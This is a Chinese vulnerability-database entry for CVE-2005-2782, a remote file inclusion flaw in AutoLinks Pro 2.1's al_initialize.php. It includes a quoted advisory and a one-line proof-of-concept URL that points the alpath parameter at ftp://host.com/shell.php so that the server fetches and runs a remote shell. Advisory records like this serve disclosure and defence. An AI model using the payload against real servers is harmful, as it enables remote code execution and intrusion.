AutoLinks Pro A_initialize.PHP 远程文件包含漏洞

AutoLinks Pro A_initialize.PHP 远程文件包含漏洞

漏洞ID 1109031 漏洞类型 输入验证
发布时间 2005-08-29 更新时间 2005-10-20
图片[1]-AutoLinks Pro A_initialize.PHP 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-2782
图片[2]-AutoLinks Pro A_initialize.PHP 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200509-009
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26208
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-009
|漏洞详情
AutoLinksPro2.1版本中的al_initialize.php文件存在PHP远程文件包含漏洞。远程攻击者可利用该漏洞通过alpath参数中的”ftp://”URL执行任意的PHP代码,这样他就绕过了只检查”http”和”https”URL的不完整黑名单。
|漏洞EXP
source: http://www.securityfocus.com/bid/14686/info

AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php?
|参考资料

来源:XF
名称:autolinks-alinitialize-file-include(22061)
链接:http://xforce.iss.net/xforce/xfdb/22061
来源:BID
名称:14686
链接:http://www.securityfocus.com/bid/14686
来源:SECUNIA
名称:16620
链接:http://secunia.com/advisories/16620/
来源:BUGTRAQ
名称:20050828AutoLinksPro2.1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112535379716486&w;=2

相关推荐: Progress Database获取特权漏洞

Progress Database获取特权漏洞 漏洞ID 1107377 漏洞类型 未知 发布时间 2003-06-14 更新时间 2003-08-07 CVE编号 CVE-2003-0449 CNNVD-ID CNNVD-200308-028 漏洞平台 Li…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享